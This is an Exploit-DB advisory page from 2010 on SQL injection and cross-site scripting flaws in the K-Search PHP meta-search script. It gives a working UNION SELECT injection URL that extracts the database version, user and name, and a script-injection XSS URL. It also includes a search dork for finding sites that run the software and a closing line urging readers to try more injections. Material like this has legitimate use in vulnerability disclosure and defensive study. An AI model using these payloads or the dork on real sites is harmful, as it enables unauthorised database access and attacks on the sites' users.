Lucene search

K
exploitdbSangteamthamEDB-ID:13993
HistoryJun 22, 2010 - 12:00 a.m.

K-Search - SQL Injection / Cross-Site Scripting

2010-06-2200:00:00
Sangteamtham
www.exploit-db.com
60

AI Score

7.4

Confidence

Low

####################################################
# Category: K-Search (SQL/XSS) Multiple Remote Vulnerabilities
# Download: http://turn-k.net/k-search/demo

# Dork: inurl:K-Search, Powered By K-Search
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group - bug-z0ne.info
####################################################

Info:
K-Search provides you a quick and easy way to start your own meta-search
engine and earn money by displaying relevant sponsored results taken from
Pay Per Click feeds or your own sponsors.

Explain:
when you have Sponsors Area Account, then you can edit your site, delelet
your site...

---------------------------------------------------------------------------------------------
SQL Vulnerabilities:

Exploit:

http://localhost//index.php?req=edit&id=999999 And 1=0 UNION SELECT
1,2,group_concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10/*

---------------------------------------------------------------------------------------------
XSS Vulnerabilities:
$words = $wrds = preg_split('/[\W]+?/',$en['term']);
$misspelled = $return = array();

............
$msp = implode(' ',$words);
$msp = str_replace('</b></i> <i><b>',' ',$msp);
$que = implode(' ',$wrds);
$en['spell_corrected'] = '<a

Exploit:

http://localhost/index.php?term="><script>alert(String.fromCharCode(Your
charcode here))<%2Fscript>&sm=Search&source=1&req=search

---------------------------------------------------------------------------------------------
Many SQL here. Check and enjoy yourself

AI Score

7.4

Confidence

Low

Related for EDB-ID:13993